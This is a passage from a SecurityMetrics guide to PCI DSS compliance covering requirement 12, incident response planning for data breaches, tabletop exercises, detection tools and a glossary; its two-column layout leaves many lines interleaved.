for establishing a successful security and requirement that allows an organization the flexibility to define their
PCI compliance program. own testing frequency or controls.
110 |
First you must perform a formal
risk assessment to ensure that the
control will meet the objective of the
requirement and address the risk
that the original control mitigated.
For example, if you are a retail merchant, you have a requirement technologies you rely on are kept current and are still supported by
to periodically inspect each point-of-interaction device (PINpad) vendor-provided updates and security patches.
for signs of tampering. How frequently these inspections should
occur can vary based on many factors. How frequently you decide to All organizations are now required to document and confirm their PCI
perform them must be based on a formal targeted risk assessment scope annually to ensure all flows and locations of cardholder data
that documents the factors that resulted in your decision. are taken into account, and any changes to scope are understood.
Service providers must perform this scoping exercise at least every
Another example that requires performance of a targeted risk six months.
assessment is if you implement the new Customized Approach to
any PCI requirement. If you take this route, you are able to define Additionally, service providers now need a process to make sure
your own security controls to meet the requirement. However, first that organizational changes don’t have a negative impact on PCI
you must perform a formal risk assessment to ensure that the compliance and the performance of PCI responsibilities.
control will meet the objective of the requirement and address the
risk that the original control mitigated.
12
Security Testing
Assigned to:___________________________________________________
Assignment date:______________________________________________
112 |
Things You Will Need To Do: Things You May Need To Do:
Perform a risk assessment annually that, at a If you are assessing PCI compliance as a service
minimum, covers the processes and technologies provider, you are required to establish a charter
that are involved in handling credit card data, and that assigns responsibility and grants authority to
targets any “periodic” requirements you meet using implement your PCI compliance program, including
a Customized Approach accountability to executive management.
Ensure that each employee completes annual security Service providers must perform quarterly reviews
awareness training, and that you annually review your to confirm policies and procedures related to PCI
training program to make sure it is relevant compliance are being followed.
Screen potential employees that will have access to Service providers must also perform a PCI DSS
credit card data or the CDE by performing background scoping exercise every six months, make sure that
checks prior to hire organizational changes don’t negatively impact PCI
compliance, and support their customers’ requests
Annually check the PCI compliance status of your
for information about their PCI compliance and PCI
third-party service providersPerform annual testing
responsibility.
of your incident response plan. Include training for
each person who plays a role in responding to a
potential incident
NOTES
Perform a PCI scoping exercise to identify all flows
and locations of cardholder data in your environment,
and any system, processes, or people that can impact
the security of your cardholder data environment
12
How To Prepare
For A Data Breach
SECTION CONTENTS
How To Prepare For A Data Breach �������������������� 115 Test Your Incident Response Plan ��������������������� 126
What To Include In An Incident Response Plan ���������� 119 Data Breach Prevention Tools ������������������������ 128
Develop Your Incident Response Plan ������������������ 123
114 |
How To Prepare
For A Data Breach
You can’t afford to be unprepared for the aftermath of a data breach.
It’s up to you to control the situation and protect your business. DATA BREACH FINES
The following section will help you better understand how to suc-
Merchant processor compromise fine $5,000 – $50,000
cessfully stop payment card information from being stolen, mitigate
damage, and restore operations as quickly as possible.
Card brand compromise fees $5,000 – $500,000
Unfortunately, organizations will experience system attacks, with Free credit monitoring for
$10 – $30/card
some of these attacks succeeding. If your organization is breached, affected individuals
you may be liable for the following fines, losses, and costs:11
Card re-issuance penalties $3 – $10 per card
A well-executed incident response plan can minimize breach impact,
reduce fines, decrease negative press, and help you get back to Security updates $15,000+
business more quickly. In an ideal world (and if you’re following PCI
DSS requirements), you should already have an incident response
Lawyer fees $5,000+
plan in place, and employees should be trained to quickly deal with
a data breach.
Breach notification costs $1,000+
If there is no plan, employees scramble to figure out what they’re
supposed to do, and that’s when mistakes can occur. For example, Technology repairs $2,000+
if employees wipe a system without first creating images of the
compromised systems, then you would be prevented from learning
TOTAL POSSIBLE COST: $50,000 – $773,000+
what happened and what you can do to avoid re-infection.
Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 115
How To Prepare For A Data Breach
An incident response plan should be set up to address a suspected Preparation often takes the most effort in your incident response
data breach in a series of phases with specific needs to be addressed. planning, but it’s by far the most crucial phase to protect your orga-
The incident response phases are: nization. This ongoing phase includes the following steps:
DATA BREACH
PRE BREACH POST BREACH
PHASE 1 Prepare
PHASE 2 Identify
116 |
PHASE 2: IDENTIFY
Identification (or detection) is an ongoing process where you When you discover a breach, remember:
determine whether you’ve actually been breached by looking for
• Don’t panic.
deviations from normal operations and activities.
• Don’t make hasty decisions.
An organization normally learns that they have been breached in
• Don’t wipe and reinstall your systems (yet).
one of four ways:
• Contact your forensic investigator to help
• The breach is discovered internally (e.g., review of intrusion you contain the breach.
detection system logs, alerting systems, system anomalies,
or anti-malware scan malware alerts).
Steps to consider during containment and documentation:
• Your bank informs you of a possible breach based on
reports of customer credit card fraud.
• Stop the leakage of sensitive data as soon as possible
• Law enforcement discovers the breach while investigating
• Unplug affected systems from the network, rebuild clean
the sale of stolen card information.
new systems, and keep old systems offline. This is the
• A customer complains to you because your organization best option if it’s possible because it allows a forensic
was the last place they used their card before it began investigator to evaluate untouched systems. This is easier
racking up fraudulent charges. to do in virtual server environments but can be costly.
Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 117
How To Prepare For A Data Breach
PHASE 4: ERADICATE
After containing the incident, you need to find and remediate the
policies, procedures, or technology that led to the breach. This Set your incident response plan into motion
means all malware should be securely removed, and systems immediately after learning about a suspected
should again be hardened, patched, and updated. data breach.
PHASE 5: RECOVER
PHASE 6: REVIEW
This is where you will analyze everything about the data breach.
Determine what worked well and what didn’t in your response
plan. Then, revise your plan.
118 |
What To Include In An
Incident Response Plan
Creating an incident response plan can seem overwhelming. To
simplify the process, develop your incident response plan in smaller,
more manageable procedures.
Never Have
While every organization needs varying policies, training, a False Sense
and documents, there are a few itemized response lists
that most organizations should include in their incident
of Security.™
response plan, such as:
Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 119
What To Include In An Incident Response Plan
EMERGENCY CONTACT/
COMMUNICATIONS LIST
Proper communication is critical to successfully managing a data Your incident response team should craft specific statements that
breach, which is why you need to document a thorough emergency target the various audiences, including a holding statement, press
contact/communications list. Your list should contain information release, customer statement, and internal/employee statement. For
about: who to contact, how to reach these contacts, the appropriate example, you should have prepared emails and talking points ready
timelines to reach out, and what should be said to external parties. to go after a data breach.
In this list, you should document everyone that needs to Your statements should address questions like:
be contacted in the event of a data breach, such as the
• Which locations were and are impacted by the breach?
following individuals:
• How was the breach discovered?
• Response team
• Is any other sensitive data at risk?
• Executive team
• How will it affect customers and the community?
• Legal team
• What services or assistance (if any) will you provide
• Forensics company
your customers?
• Public relations
• When will you be back up and running?
• Affected individuals
• What will you do to prevent this from occurring again?
• Law enforcement
• Merchant processor
Identify in advance the party within your organization that is
responsible for timely notifications that fulfill your state’s specific
requirements. This could be your inside legal counsel, newly hired
You need to determine how and when notifications will be made.
breach management firm, or C-level executive.
Several states have legislated mandatory time frames that dictate
when an organization must make notifications to potentially affected
cardholders and law enforcement. You should be aware of the laws
Your public response to the data breach
in your state and have instructions in your incident response plan
will be judged heavily, so review your
that outline how you will make mandated notifications.
statements thoroughly.
120 |
SYSTEM BACKUP AND RECOVERY FORENSICS ANALYSIS LIST
PROCESSES LIST A forensics analysis list is for organizations that use in-house forensic
investigations resources. Your forensic team will need to know where
to look for irregular behavior and how to access system security
Your system backup and recovery processes list will help
and event logs. You might need multiple lists based on your different
you deal with the technical aspects of a data breach. Here
operating systems and functionalities (e.g., server, database).
are some things that should be included:
• Process for preserving evidence (e.g., logs, • Other forensic analysis tools (e.g., EnCase, FTK,
timestamps) X-Ways)
Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 121
What To Include In An Incident Response Plan
Your jump bag list is for grab-and-go responses (i.e., when you need Your security policy review list deals with your response to a breach
to respond to a breach quickly). This list should include overall and its aftermath. This list helps you analyze the breach, so you can
responses and actions employees need to take immediately after learn what to change.
a data breach. Your list will keep your plan organized and prevent
mistakes caused by panic.
Your security policy review list should include
documentation of the following things:
Some things to include in your jump bag list are:
• When the breach was detected, by whom
• Incident handler’s journal to document the incident and what method
(e.g., who, what, where, when, why)
• Scope of the incident and affected systems
• Incident response team contact list
• Data that was put at risk How the breach was
• USB hard drives and write-blockers contained and eradicated
122 |
Develop Your Incident
Response Plan
Developing and implementing a thorough incident response plan will For organizations that process data online, improper coding could
help your business handle a data breach quickly and efficiently, while be their biggest risk. For a brick-and-mortar organization that offers
also minimizing the damage from a data breach. Wi-Fi for their customers, their biggest risk may be improper network
access. Some organizations may place a higher priority on ensuring
physical security, while others may focus on securing their remote
STEP 1: IDENTIFY AND PRIORITIZE ASSETS access applications.
STEP 2: IDENTIFY POTENTIAL RISKS • Email security: Malware executed via email message
or attachment (e.g., malware)
Determine what risks and attacks are the greatest current threats
• Impersonation: Replacement of something benign
against your systems. Keep in mind that these risks will be different
with something malicious (e.g., SQL injection attacks,
for every organization.
rogue wireless access points)
Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 123
Develop Your Incident Response Plan
If you don’t have established procedures to follow, a panicked Organize an incident response team that coordinates your
employee may make detrimental security decisions that could organization’s actions after a data breach.
damage your organization.
Your team’s goal should be to coordinate resources during a
security incident to minimize impact and restore operations as
Your data breach policies and procedures should include: quickly as possible.
• How to identify and contain a breach Some of the necessary team roles are:
• IT director
• Public relations
Over time, you may need to adjust your policies according to your or-
ganization’s needs. Some organizations might require a more robust • Documentations and timeline leader
notification and communication plan, while others might need help
• Human resources
from outside resources. However, all organizations need to focus on
employee training (e.g., your security policies and procedures). • Legal representative
Make sure your response team covers all aspects of your organization
and understand their particular roles in the plan. Each member will
bring a unique perspective to the table, and they should own specific
data breach response roles that are documented to manage a crisis.
124 |
STEP 5: SELL THE PLAN STEP 6: TRAIN YOUR STAFF
Your incident response team won’t be effective without proper Just having an incident response plan isn’t enough. Employees need
support and resources to follow your plan. to be properly trained on your incident response plan and know what
they’re expected to do after a data breach. This means training your
Security is not a bottom-up process. Management at the highest team on a regular basis to ensure they know how to respond.
level (e.g., CEO, VP, CTO) must understand that security policies–like
your incident response plan–must be implemented from the top and
pushed down. This is true for both enterprise organizations as well The regular work routine makes it easy for staff to
as mom-and-pop shops. forget crucial security lessons and best practices.
Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 125
Test Your Incident
Response Plan
To help staff, regularly test their reactions through real-life simulations PARALLEL TESTING
such as tabletop exercises. Tabletop exercises allow employees to
In parallel testing, your incident response team actually tests their
learn and practice their incident response roles when nothing is at
incident response roles in a test environment. Parallel testing is
stake, which can help you discover gaps in your incident response plan
the most realistic simulation and provides your team with the best
(e.g., communication issues).
feedback about their roles.
TYPES OF TABLETOP EXERCISES Parallel testing is more expensive and requires more time planning
than other exercises because you need to simulate an actual
production environment, with realistic systems and networks.
DISCUSSION-BASED EXERCISE
In a discussion-based tabletop exercise, incident response team CONDUCT A TABLETOP EXERCISE
members discuss response roles in hypothetical situations. This
tabletop exercise is a great starting point because it doesn’t require
extensive preparation or resources, while it still tests your team’s Before conducting a tabletop exercise, determine your
response to real-life scenarios without risk to your organization. organization’s needs by asking:
In a simulation exercise, your team tests their incident responses • Has there been any recent guidance or legislation
through a live walk-through test that has been highly choreo- that might impact your response plan?
graphed and planned. This exercise allows participants to experi-
ence how events actually happen, helping your team better under-
stand their roles. Next, design your tabletop exercise around an incident response plan
topic or section that you want tested. Identify any desired learning
However, simulation exercises require a lot of time to plan and objectives or outcomes. From there, create and coordinate with
coordinate, while still not fully testing your team’s capabilities. your tabletop exercise staff (e.g., facilitator, participants, and data
collector) to schedule your tabletop exercise.
126 |
When designing your tabletop exercise, prepare the following
exercise information in advance:
• A participant guide that includes the same information as Your team’s input will help you know where and how to
the facilitator guide, except it either doesn’t include any of make necessary revisions to your incident response plan
the questions or includes a shorter list of questions designed and training processes.
to prepare participants.
Guide
GuidetotoPCI
PCIDSS
DSSCompliance
Compliance||How
HowTo
ToPrepare
Prepare For
For A
A Data
Data Breach
Breach | 127
Data Breach Prevention Tools
This section outlines data breach prevention tools that can help Malware is software that consists of files that are copied to a target
improve your data breach response and increase your data security. computer. Even if your anti-virus software cannot recognize the
malware files’ signatures, FIM software will detect that files have
been written to your computer and will alert you to check and make
INSTALL AND MONITOR FILE INTEGRITY sure you know what those files are. If the change was known (like
MONITORING SOFTWARE a system update), then you don’t need to worry. If not, chances are
you have new malware added that could not be detected and can
File integrity monitoring (FIM) software is a great companion for your now be dealt with.
malware prevention controls. New malware comes out so frequently
you can’t just rely on anti-virus software to protect your systems. It Here are some places where FIM should be set up to monitor:
often takes many months for a signature of newly detected malware
to make it into the malware signature files, which allows it to be • Operating system critical directories
detected by anti-virus software.
• Critical installed application directories
Configure FIM software to watch critical file directories for changes. • Web server and/or web application directories
FIM software is typically configured to monitor areas of a computer’s
• User areas (if an employee facing computer)
file system where critical files are located. FIM tools will generate an
alert that can be monitored when a file is changed.
FIM can also be set up to check if web application code or files
are modified by an attacker.
128 |
INSTALL INTRUSION DETECTION INSTALL DATA LOSS PREVENTION SOFTWARE
AND PREVENTION SYSTEMS In addition to these, you should have data loss prevention (DLP)
software in place. DLP software watches outgoing data streams for
One of the reasons data breaches are so prevalent is a lack of
sensitive or critical data formats that should not be sent through a
proactive, comprehensive security dedicated to monitoring system
firewall, and it blocks this data from leaving your system.
irregularities, such as intrusion detection systems (IDS) and
intrusion prevention systems (IPS).
Make sure to properly implement it, so that your DLP knows where
data is allowed to go, since if it’s too restrictive, it might block
Using these systems can help identify a suspected attack and help
critical transmissions to third party organizations.
you locate security holes in your network that attackers used. Without
the knowledge derived from IDS logs, it can be very difficult to find
system vulnerabilities and determine if cardholder data was accessed
or stolen.
Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 129
Data Breach Prevention Tools
Conclusion
SECTION CONTENTS
130 |
PCI DSS Budget
The cost of PCI compliance depends on your organization’s structure.
Here are a few variables that will factor into the cost of your overall
compliance to the PCI DSS:
132 |
Create A Security Culture
Unless someone oversees PCI on management’s side (not just IT), OVERCOME MANAGEMENT’S
PCI compliance won’t happen. We often see departments inside
BUDGET CONCERNS
companies (e.g., networking, IT, HR, risk) expecting other departments
to take charge of PCI compliance, which means nobody is in charge of
If you’re having problems communicating budgetary needs to
it. Other times, organizations expect a third-party QSA to be the PCI
management, conduct a risk assessment before starting the
project manager, which is not feasible because the QSA’s role is to
PCI process. NIST 800-30 is a good risk assessment protocol to
assess what is in place, not create a security and compliance program.
follow. At the end of your assessment, you’ll have an idea of your
compromise probability, how much a compromise would cost, and
Security is not a bottom-up process. Management often says or implies
the impact a breach might have on your organization (including
that IT should “just get their organization secure.” However, those
brand damage).
placed in charge of PCI compliance and security may not have the
means necessary to reach their goals.
Simply put, you need to find a way to show how much money
weak security will cost the organization. For example, “if someone
For example, IT may not have the budget to implement adequate
gains access to the system through X, this is how much it will cost
security policies and technologies (e.g., firewalls, FIM). Some may
and how much damage it will cause.” Consider asking marketing
try to look for free software to fill in security gaps, but this process
or accounting teams for help delivering the message in more
can be expensive due to the time it takes to implement and manage.
bottom-line terms.
In some instances, we have seen IT departments wanting their PCI
auditor to purposely fail their compliance evaluations so they could
prove their higher security budget needs. Obviously, it would have
If possible, work with a QSA to identify security
been better to focus on security from the top level down beforehand.
controls to address what tools you may need
to implement.
C-level management should support the PCI process. If you are a
C-level executive, you should be involved with budgeting, assisting,
and establishing a security culture from the top-down.
JEN STONE
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA | CCSFP | CHQP
In my experience, small merchants and service providers tend to account for storage. This is a low-cost solution that can help key
struggle with documenting and following policies and procedures. personnel keep PCI DSS compliance on their minds throughout the
During a PCI DSS assessment, a QSA will verify that required year. It will also help document necessary evidence for their annual
policies and procedures are in place and being followed. self-assessment (or to their assessor).
Smaller merchants and service providers whose CDE consists of Large enterprise organizations usually document their policies
only a few machines often feel that they don’t have time to document and procedures sufficiently. They generally have very specific
procedures. Unfortunately, it’s not uncommon to perform a renewal and thorough change control processes, and they typically follow
assessment where the business neglected to maintain compliance documented approval processes prior to implementing changes to
due to employee turnover and lack of documentation. their CDE. Unfortunately, due to their size and the different entities
involved in their CDE management, their reaction time tends to be
At a minimum, small merchants should set up a PCI email user or much slower, with different stakeholders often making contradicto-
active directory account and add reminders in their calendar to ry decisions. When vulnerability scans or penetration tests identify
perform security processes throughout the year (e.g., quarterly weaknesses that may place their CDE at risk, it’s not always apparent
vulnerability assessment scans, semi-annual firewall reviews). The which group should be responsible for addressing these vulnerabilities.
evidence collected from these tasks can then be sent to that PCI
134 |
Small merchants and service
providers tend to struggle with
documenting and following
policies and procedures.
To help address some of these concerns, requirement 12 details Often, organizations are not leveraging many of the PCI require-
how service providers need to define a charter for the organization’s ments in a way that actually increases security for their CDE.
compliance program, involving executive management. While this
is only required for service providers, it’s recommended that larger For instance, PCI requires log centralization and daily reviews.
merchants follow this requirement as well. PCI also requires change detection or FIM on CDE systems to
detect unauthorized changes to key files and directories. To
Large organizations and service providers should establish an official achieve compliance, organizations might set up log monitoring
PCI charter that describes the management and accountability of and FIM, but then ignore every alert coming their way. They
the organization’s compliance program.3 Additionally, they should may technically have FIM and log monitoring in place, but these
implement internal audit procedures to ensure security practices are systems alone are not making their environments more secure
properly in place throughout the year.3 because necessary time and effort are not taken to respond to
genuine alerts.
PCI compliance cannot just be an annual As you implement your cybersecurity program, make sure you
audit event. understand why a security control is required so you can structure
tools and processes around the protection each control offers.
136 |
Terms And Definitions
Access Control List (ACL): A list of instructions for firewalls to Federal Information Processing Standards (FIPS): US federal
know what to allow in and out of systems. government standards for computer security that are publicly
announced (e.g., encryption standards).
Advanced Encryption Standard (AES): A government encryption
standard to secure sensitive electronic information. File Integrity Monitoring (FIM): A method to watch for changes
in software, systems, and applications to detect potential
Approved Scanning Vendor (ASV): A company approved by the malicious activity.
PCI SSC to conduct vulnerability scanning tests.
File Transfer Protocol (FTP): An insecure way to transfer computer
Captured: Data is being recorded, gathered, or stored from an files between computers using the Internet. (See SFTP)
unauthorized source.
Firewall (FW): A system designed to screen incoming and outgoing
Card Verification Value (CVV/CSC/CVC/CAV): Element on a network traffic.
payment card that protects information on the magnetic stripe.
Specific acronyms depend on the card brand. Hypertext Transfer Protocol (HTTP): A method of communication
between servers and browsers. (See HTTPS)
Cardholder Data Environment (CDE): Any individual, software,
system, or process that processes, stores, or transmits Hypertext Transfer Protocol Over Secure Socket (HTTPS): A
cardholder data. secure method of communication between servers and browsers.
(See HTTP)
Cardholder Data (CHD): Sensitive data found on payment cards,
such as an account holder name or PAN data. Incident Response Plan (IRP): Policies and procedures to effectively
limit the effects of a security breach.
Chief Information Security Officer (CISO): Similar to a CSO,
but with responsibility for IT rather than entity-wide security. Information Technology (IT): Anything relating to networks,
computers, and programming, including the people that work with
Data Loss Prevention (DLP): A piece of software or strategy those technologies.
used to catch unencrypted data sent outside the network.
Internet Protocol (IP): Defines how computers send packets of data
Domain Name Server (DNS): A way to translate URLs to to each other.
IP addresses.
Intrusion Detection System (IDS): Types of systems that are used
Exfiltrated: The unauthorized transfer of data from a system. to monitor network traffic and report potential malicious activity.
Intrusion Prevention System (IPS): Types of systems that–like Point-To-Point Encryption (P2PE): Payment card data encryption
an IDS–monitors network traffic and reports potential malicious from the point of interaction to a merchant solution provider.
activity, but also prevents and blocks many detected.
Primary Account Number (PAN): The 12 to 19 digits that
Multi-factor Authentication (MFA): Two out of three independent identify a payment card. Also called a bank card number or
methods of authentication are required to verify a computer or payment card number.
network user. The three possible factors are:
Qualified Security Assessor (QSA): Individuals and firms certified
• Something you know (such as a username and password) by the PCI SSC to perform PCI compliance assessments.
Network Access Control (NAC): Restricts data that users, apps, Role-Based Access Control (RBAC): The act of restricting users’
and programs can access on a computer network. access to systems based on their role within an organization.
Open Web Application Security Project (OWASP): A non-profit Secure File Transfer Protocol (SFTP): A secure way to encrypt
organization focused on software security improvement. Often data that is in transit. (See FTP)
heard in the context of “OWASP Top 10”–a list of top
threatening vulnerabilities. Secure Socket Layer (SSL): An outdated Internet security standard
for encrypting the link between a website and a browser to enable
Payment Card Industry Data Security Standard (PCI DSS): transmission of sensitive information (predecessor to TLS).
Requirements put together by the PCI SSC, required of all busi-
nesses that process, store, or transmit payment card data to help Self-Assessment Questionnaire (SAQ): A collection of questions
prevent cardholder data theft. used to document an entity’s PCI DSS assessment results, based on
their processing environment.
Payment Card Industry Security Standards Council (PCI SSC):
An organization established in 2006 by Visa, MasterCard, American Threat: The potential for a person, event, or action to exploit a
Express, Discover Financial Services, and JCB International to specific vulnerability.
regulate cardholder data security.
138 |
Transport Layer Security (TLS): A more secure Internet security
standard for encrypting the link between a website and a browser
to enable transmission of sensitive information. (See SSL)
140 |
Our Products and Services
www.securitymetrics.com/pci
Looking for a
PCI compliance
solution?